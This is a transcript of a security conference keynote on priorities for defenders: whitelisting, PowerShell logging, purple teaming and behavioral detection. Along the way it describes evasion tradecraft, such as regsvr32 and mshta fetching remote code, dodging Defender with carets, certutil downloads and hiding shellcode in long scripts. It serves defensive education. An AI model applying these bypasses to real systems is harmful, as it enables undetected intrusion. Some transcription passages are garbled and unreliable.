
5 Things that Matter

BSides Charlotte · 2019 · 56:35 · Published 2019-11

Speaker: Dave Kennedy
Style: Keynote

Transcript [en]

Thanks. Well, good afternoon. Test, test. Give me just a second here, hang on. Sorry for everybody that I'm scratching on the wife, sir. Good. All right, thank you all for coming this afternoon to hear me talk about the five things that matter. This talk for me is an important one, because it's the five things that I typically see in most security programs where we have a lot of problems. With my talks I like to keep them fairly high level and also super technical as well, and balance both of those, so I'll give you some nice bypass techniques for Windows Defender and some other things throughout the talk and everything else. But really, this talk

kind of hits home to me, because it's one of the things where, when we go into a lot of companies, we see a lot of different things. Appreciate the background. It's been fun being in the cybersecurity space. It's interesting. My dad just recently got on Twitter, I'd say, and it's been literally interesting, actually, so I know a lot more about him than I thought I would ever know about my dad. One thing he did recently, a few years ago, is he spoke at DerbyCon and he let the whole world know that I was scared of clowns, and it has not stopped since. I get people sending me clowns all

day, every day. There's people threatening to hire clowns to come to the office. Like, it's been a whole thing. But recently he just released my report card from when I was a senior in high school, in which I had all A's except I had one B, and it was in typing. And then I finished out high school and I graduated in summer school, and I shortly joined the Marines after that. But it's been a great ride. We never thought being able to talk in front of people was a thing, or being able to do computers for a living was a thing, so it's been a really awesome experience and I've gotten a lot of

great things to do for it. So with that, I'm gonna show you a quick video, and this is one of my favorite things in life that I got to be a part of, kind of. I'm part of this segment, but this is from Mr. Robot, and in season 3 Elliot is basically getting fired from Evil Corp and he's trying to evade the security folks so that he can stop the Dark Army from actually taking down Evil Corp. So Elliot is basically trying to evade security and get around them. Here, I'll throw a little thing in here that I thought was really cool. It's kind of cool when they dropped our

name on a TV show that I even worked with and helped, and it's because throughout this series, if you look at the screens, in season 1 episode 5 when Elliot is hacking into Steel Mountain, they use the Social-Engineer Toolkit to spoof a text message that allows them into Steel Mountain, and then in season 3 episode 1, I think it was, when Darlene lit the fire up and all the money, the ransomware that they deployed, they deployed through the Social-Engineer Toolkit. So a lot of really neat things you get to experience, and it's really cool. Interesting: I have also been in a rap video. Never thought that would happen. I was in a Chris Brown rap video,

and it was really interesting. I flew out to LA and it's a really interesting piece where he basically reached out to our website, the producer did, and he's like, hey, can Dave advise us on this rap video? I didn't know who it was at the time, and I'm like, the only restriction is that Dave needs to be in the hacking video, needs to actually be in the video. So there I am in the back, like, hacking away, and the whole premise is that Chris Brown broke up with his girlfriend and he wants to delete all the pictures off of her phone, so he hires his best friend Dave to come in and delete all the photos off of

there. So, I don't know, this is really cheesy. Don't look it up at work, by the way. It's definitely not safe for work in any way, shape or form, but that was kind of a fun one too. So while we're here, when we look at security we talk a lot about things that are our challenges, right, and we all have challenges. I always like to make the joke that we could fix security today, and actually you can walk out of here with the million dollar secret of fixing security today, right now. I'm gonna give it to you for free, okay. And that's if you have one dedicated person to

security for every single employee that you have in your organization, because you can just sit behind them and be like, no, don't click that link. You just clicked it, okay, hang on, grab the computer, pass it over to the person next to you, they reimage it, you're all set, right? Security would be fixed. It solves all the issues that we deal with today. Software development lifecycle: you have a security person behind there like, that's SQL injection, you can't code it that way, code it the other way. Okay, got it, okay, cool. You know, it literally fixes things as we see it. I think we don't have that luxury, so a lot of us deal

with a lot of different things, whether it's politics, whether it's not enough funding or staff, whether it's not having the people to be able to support it. There's a lot of things that create challenges in our environment, and so that's what we're gonna be talking about today. And still to this day I haven't found a piece of technology to replace me yet, personally. Artificial intelligence has not replaced us as attackers or defenders. There's a lot of things kind of coming up from a marketing perspective that are kind of interesting. So what are the top five things that matter, at least to me, when it comes to security? Might not be everybody's, but these are things

that I commonly see pretty much across the board. Before we start on the basics here, it's easy to say that everything's broken, and I don't think everything is broken. In fact, what I would say is that over the past ten years I've seen security go through a complete transformation where we've gotten better. We're at a place now where you actually see defenders winning against the red team. We're at a time now where people are actually detecting attacks earlier on. Now it's not perfect in any way, shape or form, and I see something like Starwood and Marriott, right, where they had breaches for three or four years without detection. Again, not perfect in any way,

but we're getting better in a lot of the cases that we're doing. And I can say, being a red teamer, and I'll talk about what that actual concept means because that's changed a lot over the past ten years, but actually being a red teamer, I can say it's substantially harder for me to break into companies. Substantially harder. One little thing can totally set off an analyst and go into triage mode to figure out what was actually happening. One of our testers recently was doing a red team engagement, and we have our own research and development team over at TrustedSec, and they develop all those cool weaponized tools that we use. We don't

disclose them; we just use them for our customers for them to get better than anything else, and there might be a debate about that or whatever, I understand. But we used this awesome, amazing thing on this customer for a red team. Got into the environment, bypassed all their EDR products, got command and control infrastructure completely undetected, it's perfect, used a bunch of undocumented ways of getting remote code execution onto the system, things that haven't been discovered yet, flew completely under the radar, right. And you might be like, well, why are you doing that in the first place? I'll explain in just a second. What was interesting is about four minutes later we got detected. Four minutes, using some really amazing

tradecraft that we had spent years developing, and we got detected in four minutes. How did we get detected? Well, what they had done in their environment, which I thought was really unique, is that they baseline people in two categories, technical and non-technical, and what they look for is anybody that would run command line arguments. In this specific case we looked at ipconfig to see what network we were on. Harmless, obviously. It's not code execution in any way, shape or form, but this person fell in a non-technical category and typed in ipconfig. Boom, nailed, right? It's stuff like that that makes it really challenging for us as attackers to start to go into

environments. We don't know where all the landmines are at, and that was never the way five years ago, by the way. Five years ago we could go in with Metasploit or autopwn and destroy a bunch of systems, and the only way they would know is if the system crashed, right. Things have changed substantially over the past five to ten years to where we are a better industry, and it's amazing to see all of the work that's gone into making that possible. That's all due to people. That's all those other people in this room sitting here today, making your organizations better every time with what you're doing, and that's a huge testament to what we're starting to

see. So what are some of the things that we see out there? Number one: the basics. The basics still kick our butts today. You know, we want to stop adversaries from breaking in using zero-day exploits, and we still have Password1 as our main password for all of our users, right, and that's a people problem, right, and in many cases there's a lot of things that we have to incorporate into that. But weak passwords, password management, two-factor authentication, segmentation, my god, right. Segmentation is one of those things where we should have been doing it a long time ago, but we have to re-architect how we do business. Try doing that in a large

organization. Small organizations might be a little bit easier, but in large organizations re-architecting and redesigning your entire infrastructure is a major thing. Probably one of the most effective ways that we get stopped as attackers is through application whitelisting. By far, today, application whitelisting, again by far, is the most effective control you can put into your environment today to stop most of the stuff you see out there. Now don't get me wrong, there's what we've called living off the land binaries and scripts, and there's ways of circumventing those controls, but guess what: 84% of the noise today is binaries and applications that are untrusted in your environment. 84%. What happens when you take that away? You

don't have 84% anymore, right? So you have 16%. Do the math, right? Yeah, okay, thank god. I always freak out about that with that one statistic, that I get the numbers wrong. Then you have 16% now you can focus on in your environment, to say hey, these are the things that we can do differently to identify the noise and monitor for deviations of patterns in your environment. So again, one of the most effective ways out there. Not easy. Has anybody implemented application control across your entire environment in high integrity mode without any exceptions? Not happening, right? Not happening. But there are ways for us to at least get it

in there to do a bit better of a job. Some basics that I see: blocking unsigned executables in user profile directories as a start. Like, basic, right? Hey, it's not a code-signed application, you know, just block it in your user AppData and your Downloads and everything else, and don't allow it to execute in the first place. Guess what that does? Probably about 75% of that 84% you see out there today. Constrained language mode, being able to implement that. So let me just get this out of the way: do regular users need PowerShell? Heck no. Heck no, regular users do not need PowerShell, right? So why does every user need access to PowerShell?

You could do that within Group Policy, right. If you have software restriction policies, you have AppLocker and Device Guard, right, you can do that directly with Group Policy to say hey, if they're not part of these groups, don't allow them to execute PowerShell. And there's two locations, by the way, in PowerShell that people almost always forget. You have C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and powershell_ise.exe, okay. Those are your two main locations, but you also have in SysWOW64, which is in the Windows directory, C:\Windows\SysWOW64\

WindowsPowerShell\v1.0\powershell.exe and then powershell_ise.exe. Those two locations are your two main culprits for what you want to lock down with those specifically. So this thing's long: users' access, PowerShell version 6 and above, heavy logging. Everybody familiar with script block logging? Has anybody ever enabled script block logging? Did anybody crash servers when they did that? Did your Splunk licensing go up 10 million dollars? Yes, right? So script block logging is amazing. It's also the noisiest log that you're gonna have in your entire environment, and I wish we lived in a world where money wasn't a problem, like again, one security person

to one employee. When you enable constrained language mode, there is stuff of Microsoft's internals that you never want to see deployed in your environment from those PowerShell scripts. Man, they do stuff wrong, especially if you're an Office 365 user or customer. The amount of unsigned PowerShell code that is flying through your network is absolutely astonishing. It's incredible. And by the way, if you ever want to fool a SOC, by the way, just take one of those scripts, they're like 700 pages long, put your shellcode injection in the middle of it, because no one's ever gonna see it, and just upload it and you're all set, because they're not code signed in the first

place. It's still gonna create the Microsoft function and do all this stuff, and it's also gonna get you remote code execution at the same time without being seen. So apply that one specifically. Also PowerShell version 6 and getting more verbose into logging. What's interesting with PowerShell is it integrates into what's called the Antimalware Scan Interface, which I'm going to show you an example of here in a few. AMSI is a great abstraction layer, getting a little more clear of what actually is about to be executing on your system right before it hits the actual interpreter itself. And so with AMSI there's what's called AmsiScanString and AmsiScanBuffer,

and what you can do with PowerShell scripts specifically is scan those prior to them actually executing on your system, which gives you a lot more verbosity. Now the issue with AMSI is it runs in user-land mode, so as a user you can disable it, so there's a number of ways of defeating AMSI, shutting it down completely. But what you'll see in the demonstration here is that even with AMSI detection, you only have to modify things in just this tiny, tiny, tiny way to circumvent their complete detection criteria. So it's still a really rudimentary way of detection, but still good visibility if you're pulling that data back to look at it. I'm a huge fan

of Sysmon. Sysmon leverages what's called kernel-level Event Tracing for Windows, ETW. It's a great way of getting more visibility into things that are happening in your environment without having to deal with crazy kernel drivers. So Sysmon is a great way to deploy in your environment to see a lot of good stuff, and Olaf has probably the most comprehensive Sysmon configuration files. What's great about Sysmon is you can actually configure them to be alerts and alarms. It does its own central correlation, essentially. You can say if this does that, okay, that's good, and then send this alarm back that specifically does something. This is great for living off the

land binaries and scripts and everything else. Please, please, please enable the Windows Firewall internally. Just that. That's easy, isn't it? For users? Not easy. Kind of easy. Easy for regular users. Why does that matter? Workstation-to-workstation communication is typically how we move for lateral movement, so you enable the Windows Firewall, basic concept, and all of a sudden I can't pivot from Bob in IT to Bob in sales to Mary in IT's computer. You eliminated an attack surface that we previously had that we wouldn't have necessarily if you had those controls out there. Detections: I will repeat this throughout this presentation. This is one of the most important pieces out there, but in order to do endpoint

detection, and in order to do detection at all, you need to have endpoint logs. I'll repeat that: you need to have endpoint logs. I know your Splunk licensing goes up to ten million dollars, but you need them. And I'm not a rep for Splunk, by the way, either, but whatever you have for your SIEM, your correlation engine, if you're using something like Elasticsearch all you need is storage, then, right. But you leverage something like endpoints, you have to have logs. That's where most of your attack surface comes in through. Again, obviously other things like east-west traffic, not just north-south, when it comes to communications, DNS logs, script block logging is great,

command line auditing, another Group Policy feature, right. You turn that on, you can see command line auditing as it's going on. Why is Bob in sales executing an ipconfig? Some decent pieces there. Visibility first, understanding the specific tactics, techniques and procedures that attackers are using in your environment from a detection standpoint. What I see in most companies, and what I do, there's a thing called Ask an Expert, which I apparently am pretending to be an expert for, and so when you're an expert the biggest calls that I get are: how do I take MITRE's techniques and how do I run them in my environment? How do I write the

detections off of them? That's gonna be our RC, and then they call that my adversarial simulation program. I'm like, okay, we got a lot of discussion to talk about here, okay. So what happens with a lot of these techniques out there is that you're not focusing on the tactics or the procedures that the attackers operate by, or even understanding your threat models around which groups are specifically focused on you as an organization, and what ends up happening is you get a bunch of command line parsing tools you're writing specific detections for, and circumventing them is usually very trivial. A good example is a tool that I wrote called Magic Unicorn, which is a

PowerShell exploitation framework, and one of the customers that we were working with would look for EncodedCommand, which, if you're not familiar, PowerShell's EncodedCommand is the way to essentially get around what are called execution restriction policies. And so within EncodedCommand you can cast something in Unicode and base64 encode it, and your entire application would then run by running an EncodedCommand. So a lot of people look for EncodedCommand being run in their environment. Look for -e, -en, -enc, -ec, by the way, which a lot of people don't know about. So I wrote Unicorn to basically convert EncodedCommand back at the very end,

but you never actually call EncodedCommand in the first place, which circumvents all the detection criteria that's out there. So again, looking more at the behavior, which we'll talk about here in a little bit, becomes really important, more than the actual technique that was being leveraged in your environment. I'd want to know every single time PowerShell is communicating out to the Internet. Is that gonna generate a lot of false positives? Yep. Can I baseline it on my environment? Yep. Do I get a lot less as time goes on? Yep. Do I need people to do that? Yes. So, you know, behavior becomes really, really important in environments, but you need the people to be able to really establish that and

use it. And so my personal belief is that we purchase tools to try to fix poor security programs, and let me talk about that for a second, okay, in this concept, because if you have a group that is already overworked, right... Is anybody here not overworked? Does anybody just chill at their office? They don't do anything, they just chill. Got one. That's pretty awesome. Look, one person just chills at the office and doesn't do anything. You're not dealing with meetings or fires. It would be great if we could just focus our entire day on security, but that never happens, right. We're dealing with a lot

of other things. You got ITIL and change control, we got to go to the CAB meeting for something else and do this and that, and then we have audits going on where we've got to provide context and data to it. Oh hey, there's a fire over here where the system's burning down, was it our endpoint agent that did it? You know, there's all these different things that impact us on a day-in, day-out basis. And so when you take a piece of technology that you already have embedded in your environment and you say this product is crap and you rip it out and you put a brand new piece of technology in, what happens? That next product, it's crap,

because it's how you're leveraging the tools and technology. You don't have the resources to be able to leverage it in the same way you can anything else. And like, I hear all the time, you know, we're using Qualys, we're using Nessus, we're using Rapid7, or whatever you want to use, it sucks. I'm like, well, what's your process? Well, we don't have a process. Okay, let's talk about it. It's not the scanner that's your fault; it's your program that you built around it that is not working as anticipated. Focus on that. So usually when we purchase new tools, we already have everything we need today in our environment, typically. You may be able to

supplement a couple of things, but we usually already have the technology today to do what we need to do, yet we go and buy the latest and greatest because it's next-gen, it's awesome. So most organizations we see are still at the basic concept level. They don't have a lot of the enhanced detection. They're not focusing on simulations and emulation, which I'll talk a little bit about here in a few minutes. Some are much further ahead than others. There's a company that we do work for that probably has one of the best security programs that I've ever seen, and I love to tell the story because it's where we just got annihilated, to where

we looked like a bunch of kids, and we don't like that feeling, right, when we're going in on a red team engagement and you get in and they detect you and shut you out in every single way, shape or form you possibly could have gotten into their environment, and then the entire blue team is clapping and cheering on the phone. Wow. Like, can't we beat TrustedSec? Yeah. You know, it's like, shoot. So we're like playing Careless Whisper in our Slack channel and, like, eating popcorn and ice cream to get over it. And, you know, one thing we decided is, hey, we don't ever want

to have that happen again. And so the next time around we destroyed them, and we were clapping on the phone, and then the next time around they destroyed us. It's that back and forth that works really well, right. But the way that they do it is they have an entire team that focuses on understanding their threats in their environment and building their program around that, and then simulating that in these types of tests and simulations that we see out there. So again, some of these are great examples of things that actually work in environments that we've seen, and collaboration is one of the biggest pieces that I can't hit home enough about. I'm gonna break down the

concepts here, and maybe this is education, or a repeat of something that you already know. But we talk about blue team and red team, we talk about purple team. Purple teaming isn't a new concept. Purple team has been around since 2007, at least, as far back as I could find a term usage of purple teaming, and purple teaming isn't a new thing that we're trying to build on top of the security industry. What purple teaming is, is just collaboration between the red team and the blue team. And what we used to do, and I'll talk about this here in a little bit, we used to go in, we'd just break everything,

and you'd break everything, you'd hand an awesome report to your customer, and you'd walk out like, man, I just destroyed this company. They're totally screwed. Good luck. And then next year you'd come back, same thing, just own them again. They fixed all the technical findings; they didn't fix the reason why those technical findings were there in the first place. And so year after year after year after year it was red winning, winning, winning, winning, winning, and it was red doing their mystique and their amazing feats and their cool hacker stuff, with their screens flying with, you know, green, green, green text everywhere with cool ASCII art. You have to have ASCII art to be considered a hacker, in my opinion.

It's also a prerequisite for any tools that we release at TrustedSec. It's actually in the tool release guide: ASCII art. And so any tool gets judged on the ASCII art too. So anyways, but that wasn't the right way of doing things. We weren't helping anybody by going in and destroying companies every time. Where companies really start to shine is when you have that collaboration between red and blue, where instead of doing covert all the time to test the effectiveness of your incident response program, you're doing overt testing. You're working with them as you're going through your simulations and you say, listen, here's the things that we're doing, here's the things you can get better on, here's the

things that you're just missing as far as detection. You walk out of there completely different than, hey, here's a list of 10 findings, go patch, you know, these specific systems. So that collaboration becomes really, really important. I'm a huge believer in simulations and emulation. I think tool releases are great. There's a lot of debate right now on whether or not tool releases do more harm than good, whether researchers disclosing techniques do more harm than good. I'm a huge advocate of giving tools to people that may not be able to develop those tools so they can test their own environment. Attackers are gonna do it. Why can't we have the same types of

tools out there? Yes, they're gonna be used by adversaries. Cobalt Strike, by the way, is used all the time by Russia. All the time. Would you say that Cobalt Strike is a bad tool? No. We use it as testers all the time to test effectiveness, because we don't have a Mudge to be able to build that tool internally with our own capabilities, and so we have to have the tools necessary to do our jobs, as does any carpenter that has to do their job. Could a carpenter take one of his devices and stab somebody with it? Absolutely. When it comes to research, we have to have that conduit of getting better and working

better toward one goal of making things more secure. Without simulations, red and blue don't understand each other. So when I go through and I do a simulation of somebody, my goal isn't to destroy them. It isn't anymore. I used to really like to destroy people, but it used to be that way. My goal is to make them better in what they're actually accomplishing, and so simulations and working through these types of things make a big deal. Usually companies don't even have a foundation, by the way. We hear all the time, hey, we want a red team, and we're like, okay, what does that mean to you? Like, oh, we want you to just, like, completely

annihilate us and break into us so that we know exactly where all of our weaknesses and our exposures are in our environment, so that then we can patch them all and be secure. I'm like, that's not how any of this works, by the way. This is not a red team for you. Most organizations that we deal with are not at a maturity level to deal with red team engagements. Almost 99% of them are not at a level that they even need red teams in their environment. They don't even have basic forms of monitoring, detection, or even endpoint logs in their environments. What is a red team gonna do for them other than destroy them and

show them where they have faulty programs in there? And that can be used as a wedge too. So one thing I'll say is red and blue are better together, and I'm a huge advocate of that. I have become more blue, and I still say I'm red team, but my whole operation of thinking is all blue. Like, if I'm gonna write something, a tool, a new technique or an attack vector, how am I gonna stop that? You know, when I do something new or unique, I make sure that it doesn't impact blue, like by releasing a specific exploit, you know, to the wild to impact other organizations and companies. I've seen everything about that. I used to write

exploits all the time, publish them up on milw0rm, like, yeah, I just got this awesome zero-day. Here you go, good luck, you know, vendor, go patch it. A little bit more refined now, and times are a lot different, by the way. That was a badge of credibility, you know, earlier in times, what exploits you could write and get around data execution prevention and stuff like that. But again, we talk about the red team today like it was ten years ago. We always say, oh, the red team is not special. I hear that all the time, like the red team's not a

special group. Well, yeah, they are a special group. They understand offensive capabilities within an organization. If you're not applying the red team the right way, then you're right, they're just sitting there destroying your environment. And so the terminologies that we use around penetration testers, by the way, ten years ago, right, pentesters just come in, they just destroy the organization and they walk out. Yeah, I guess that still happens in environments, but that's not exactly what we're designed to be doing in organizations. The term hacker, by the way, applies to both red and blue. It's not just the red team that has hackers. The blue team are hackers. Why aren't you hacking our stuff up to figure out how

to defend it? Aren't you writing awesome code to figure out ways to respond to us more effectively? We're all hacking together in this specific way. And so the industry changed, and this happened a while ago. It just takes a lot of terminology fixes to do this. People think that red teams are pentests. People think that pentests are vulnerability assessments. People think I want to be assassins or red teams. People think that physical assessments are, you know, social engineering, which it can be a component of that. So there's a lot of terminology issues that we face in this industry right now, and a lot of it really is, hey, red teams are more designed to understand your threat models toward

your organization and build your capabilities off of what the capabilities are of that organization, and to be a little bit better. That's it. Not exponentially better, but going to the level of what that organization is willing to actually accomplish. You might see a theme here around sharing and collaboration, but when we work together and understand things we get better. Research, by the way, sharing things and getting better tools, doing different things. I thought some of these were great. This one was how to call PowerShell without ever calling PowerShell. That came from Daniel Bohannon. Both of these came from Daniel Bohannon over at FireEye, and this was a specific one: it just runs forfiles and basically

will eventually execute PowerShell with no exit on there, and you could just launch PowerShell. Thought that was a good EDR bypass, by the way, for all you folks. This one down here I thought was really brilliant. So is everybody familiar with what we call living off the land binaries and scripts? If you're not familiar, feel free to raise your hand. Okay, got a couple. I'll explain it real quick. So if you look at exploitation, right, our whole goal is to get code execution onto a system, right. We want to get code execution. Now granted, we might have other objectives, password stealing or things like that, bypassing multi-factor authentication, etc., etc., but with exploitation our whole

goal is to get code onto that system that we can then run to compromise that asset, and then from there, if we do ransomware or move laterally across environments to other systems, primarily. I gave a talk, I think it was DEF CON 13, it was the very first ever PowerShell security talk, and if you talk to the folks at Microsoft they'll say that I was the first person ever to give a PowerShell security talk, which is really cool to say, like you're kind of like the father of PowerShell security, you know, kind of kicking that thing off was kind of neat. It's called PowerShell OMFG, and it was when PowerShell had first come out and it wasn't in every

operating system yet. It was Windows Vista at the time, and they were looking at making it an optional requirement in Windows Vista, but they had come out and announced that any further operating systems would have PowerShell embedded into it. So I just had to take a look at it with one of my good friends, Josh Kelley, and we're like, wow, this is really powerful, you can do a lot of great stuff with it. And I said, listen, you know, giving a full-fledged programming language onto a Windows environment, aside from VBScript and others, is gonna be pretty damaging, I think, to security, especially with no logging or anything else. It's gonna be a big deal and it's gonna be

one of the main fronts of attack, and lo and behold PowerShell's become a major front of it. Now one thing I'll say about Microsoft is that Lee Holmes is literally the catalyst for security in PowerShell, and he deserves everything that he gets and more in raises, I'm sure. He literally got everything that is currently in PowerShell: Constrained Language Mode, logging and verbosity in there, script block logging, all the security features that we now know are inside of PowerShell. You all just have to kind of update your stuff from PowerShell version 2 up to PowerShell version 6 or above. Anyways, so that's PowerShell. Well, the way we used to hack about ten years ago is we

would look for things like Java, right, which had a lot of major issues in it, or Adobe, which had a lot of major issues in it, or Office products, which would have, still have, a lot of major issues in them. And so you'd have these products and we'd say, well, we know that a user probably has these products on their system, so we know that it's there. It's the same thing with living off the land binaries and scripts, and this is why it's so kind of damaging: it circumvents application whitelisting, your application control. It's that Microsoft ships with binaries across the operating system that allow it to work, right? You have calc.exe, for example, right? It's

code signed by Microsoft, you know, it has a specific function that it produces. Well, all their binaries in the Windows operating system have additional functionality built in as well. Like, one of my favorite ones, and I'll show you a demonstration of this, is regsvr32. It's under the System32 directory, and regsvr32 has a /i parameter that allows you to go and download those scriptlets directly from the internet and run them without any type of detection whatsoever. So you can go and download code directly from the internet, execute it automatically without any type of detection. So using a code-signed Microsoft Windows binary to then go and download code directly off the internet and

execute it in an authorized state. There's about 77 of these binaries in Windows. I do it with mshta, CBD THC, csc, THC Matt have been checked, there's a whole bunch of these, right? Even BGInfo, the background info that you use to show the IP address, this has remote code execution functionality in it. So, you know, there's a lot of different things that are code signed by Microsoft that give you full capabilities. Now let me show you a little demonstration here really quick. Power this back up again, sorry about that. So this is a fully updated version of... if it comes back up, I hope it does. It'll come up, take a second. Here it goes. Oh my

god, or not. There it goes. All right, so I got a fully up-to-date version of Windows 10, and this is an example of what regsvr32 would look like as an attacker, okay? You give it a /i, /s, and the /i is the most important, and we're gonna go to trustedsec.com as an example, okay. And so here we're just gonna go and download a script object. It could be whatever extension type you want to, it doesn't have to be XML or TXT or SCT or anything like that. It can be whatever you want to, because imagine hosting something like GitHub, and it's just a GitHub project and it says readme.txt. Does your defender

gonna see that? And so this will basically create a script logic and execute this code for us. Now interestingly enough, Microsoft knows that this is bad, right? So I'm running the latest version of Windows Defender. If you notice here it was last updated the 24th, so four days ago, okay? So it's about four days old. I wish, you know, hey, I didn't hook up to the internet today, I apologize. But if I run this, what happens? Ooh, got snagged by antivirus, right? It must be a really good detection, I'm sure. Let's take a look at this. What if I throw a caret into here? Wait, hang on, hang on. Oh, too good, okay. What if I throw another caret here? Oh,

still denied. What if I throw three carets? This screen to go away... oh, we get through. Thank you, that's my demo, I'm Dave Kennedy. This is what we're dealing with today when it comes to detection and prevention, and this is a clear-cut case of what we see EDR products do, by the way. EDR products looking for that /i: throw one caret in there, let's get seen, throw two carets, three carets, you're good. Sounds good. Another couple funny ones: throwing legitimate words into your code. Take a dictionary and just have variable substitutions in there of dictionary words, because it makes it look more predictable from an analysis perspective that it's legitimate, because you're

using legitimate dictionary words, not coding language stuff. There's so many different tricks that we have out there, but it's super trivial. Does this make me an elite hacker, by the way? Yeah, right, I just bypassed Windows Defender. It got rated number one in the antivirus category this year in whatever the heck magazine that was, right, number one. Got around it, right, three carets. So, you know, with living off the land binaries and scripts, that's a whole nother attack surface that we have available to us. And, you know, when I was gonna get to this one is that this one was found in the wild, which I would ask, does anybody here actually, would anybody here actually

detect this? And I'd like to see an honest answer, don't be like "my detection program is the best." All right, listen to what it's doing first, okay? It's going out and it's using certutil, okay? Everybody: certutil imports and exports certificates. There's a -ping option where you can download code directly from the internet with certutil. Why that was ever a feature, right? Don't know, but hey, it's cool, right? You can download code directly from the internet in any context and use certutil for it. Fine, sounds good. Now here's a crazy detection: they download the PowerShell code directly through certutil and then execute it with PowerShell, never calling out to PowerShell at all

in the first place. Pretty awesome. Where'd you detect that? No one looking for certutil talking out to the internet? We're looking for... you have to do that from command prompt. Well, that one's cmd, see, but you don't need to run it from command prompt. Oh, by the way, as an attacker I can't remember the last time I actually dropped into a command prompt, by the way. We know you all look for us running cmd.exe, but that's a good one I would leverage completely in PowerShell. So

that's the good way of doing it, right? More than that, the behavior of understanding applications that have been beaconing out in the first place, and then from there going there, totally agree, yep. A couple, I agree: baselining your environment sounds like a marvelous counter. So, by the way, without talking about this, most of the folks in here, defenders, probably wouldn't have known that you could do that, right, that there are ways with three carets to get around Windows Defender, right, or there are ways with certutil to go and do this. Or, you know, one of my favorites is mshta.exe. Most folks know about HTA files, so HTA files are high-content HTML files, and what's damaging about them is

you can run them in a browser, and you can have any browser execute them, so basically you can hit open and do anything you want to there. And so with HTA files most people block HTAs at the firewall, right? So they don't allow those to actually execute, but mshta.exe is a phenomenal resource. You can point mshta.exe to any website you want to, again download the code and execute it directly for you. I have Mimikatz running off of mshta, whatever you want to, running off of mshta without an issue. So again, a lot of issues with Microsoft code-signing applications that give us

code execution functionality. But it comes into sharing: you wouldn't know about that if you weren't here today. Your blue team probably wouldn't know about it unless you tested it out with their red team. Your threat hunters wouldn't have known about it unless they've seen it in the wild before. All of those pieces of knowledge coming together to work together and collaborate work really, really well. Number four: behavior. Focus on... and Jeff Moss nailed this on the head. It was last year at Black Hat before he introduced the keynote, and Jeff Moss said, as an industry we are focusing solely on techniques and we have no idea what the tactics and procedures of attackers are. He's spot on, 100% right. MITRE ATT&CK is a great

example. MITRE ATT&CK is a phenomenal resource, don't get me wrong, it's great. It walks through a lot of techniques, allows you to do some simulations in your environment, but it is not a cheat sheet for detection. That's not what it was designed for. If you're trying to do whack-a-mole detections off of the technique section of MITRE, your program's probably missing a substantial amount of gaps when it comes to attacking, and I would say it's probably pretty easy to circumvent your detection criteria. So we are focused on the techniques, not tactics or procedures. So once we realize that, we can start to look at what that means to switch more to the tactics and procedures, behaviors,

and behavior is a loosely level term across this entire industry. But again, a behavior: why is Mary in sales using PowerShell in the first place? That's a good baseline, that's a good behavior, right? Why is regsvr32 beaconing out to the internet when it hasn't before, in our environment, ever before in the past? Those are great behaviors in your environment, things that you can count on to look for. Again, is it gonna generate false positives? Absolutely. Can we minimize those false positives and baseline the environment? Sure. You know, do we need people to do that? Yes, I already said that earlier today. So those are some of the things that we'd

be focused on. A good example of a behavior: I was going into a company doing a threat hunting exercise, and it was one of those engagements where the first minute you sit down you're like, I got it, I got him, I got a good one. And it was an Exchange server running as a system account on Exchange, sure, which also happened to be a DC. It wasn't exposed to the internet, thank God, that was one interesting piece about there, but it's also a DC. And the best part about it was they had a PowerShell script that was going every night at 2:00 in the morning, going to China and downloading a binary directly into memory through PowerShell, right, non code

signed, all the other good stuff, right? And I'm like, I see this attack and I'm like, I just made my money for this one, I'm good. I got an APT in here, you know, I got some hackers, you know, we're gonna dive into this, everything's fine. Now I go to the customer, I'm like, hey, I hate to be the bearer of bad news, but you're breached, like really bad, like domain controllers and command and control and all their stuff. And it's like, oh my gosh, and it starts bringing up this incident response team, we start looking at it, and it turns out they have a third-party marketing company that does metrics off of the Exchange

performance. It's out of China, it downloads unsigned binaries at two o'clock in the morning, apparently, and it's perfectly legitimate. That's fine. It's a DC, DHCP as well, which is even better, you know. It's like literally every step of the way, right? And it's like they're using attacker techniques, their code is obfuscated, you're leveraging Invoke-Expression to go and download code directly from the internet, all great stuff, right? So these are things that we typically see in environments where, like, hey, I found something, that's a behavior. I'd want to know that that behavior's there, but I can baseline and look for other things in our environment, right? So visibility becomes critical. I'm going to

show you an example here in just a second of getting around visibility, or a lot of the traditional protection mechanisms that we have. But protection takes time, and the biggest piece that you can walk away out of here with is that while protection takes time, we can augment things with detection to get better and faster at what we're doing. A good example is when that DDE auto came out a couple years ago, right? I mean, remember that DDE auto came out as a way to get remote code execution in Excel files without macros, right? And so with that, Microsoft said at the time they're working on a patch. They eventually end up doing it based on the damage and criticality it had. With DDE auto, it was being used in the wild within seven hours. Seven hours, we saw ransomware campaigns hitting it. Could you implement changes in your environment within seven hours across your entire organization? Probably not, right? But can we detect certain things in our environment in seven hours? Probably, if we're getting the right sources of information, right? So again, detection becomes much faster, much more nimble. We still focus on protection because we're not giving up on that; we still need to focus on those detection pieces and being faster. Some quick brief statistics: this is over at Binary Defense, we analyzed a bunch of code execution samples, and what we found is that 82 percent, I said 84, I apologize, I

got that wrong, I did get the numbers wrong, it's 82% are executables. So still to this day they choose executables. 13% is PowerShell, 4% is living off the land binaries and scripts. So living off the land is a very small number, the one that most companies are probably trying to focus the most on, when they're not even getting PowerShell logs, not focusing on allowing executables in their user directories. And again, our priorities become completely skewed and different.

Let's see, customer data aggregated across our EDR pieces for it and then our SIEM pieces for correlating things that actually made it to endpoints, yep. Some breakout time frames: on average it took about an hour and a half, almost two hours, to break out of a specific system. So when a machine becomes compromised, what happens from there, you know, how do they move out and spread laterally across the environment? About an hour and a half. So us as defenders, we have about an hour and a half time frame to respond to that specific incident and then go from there, right? Here's the thing: if an attacker customizes anything, anything at all, they typically go undetected. And what I mean

by that is our reliance on tools and technology. Those tools themselves typically go unnoticed. Now where I get busted, it's not from a tool, I get busted by people. And so every time I go into an organization we already know how to get past the EDR product and this antivirus product and this specific protection mechanism. You know exactly what we're doing. When we get tripped up, it's by people doing creative things, we're looking at unusual behavior. Customized stuff works. Take a technique, modify it any way, again the three carets versus two carets, throwing seven carets, throwing ten carets, you can highly a piece key ten carets. I'm telling you, I am...

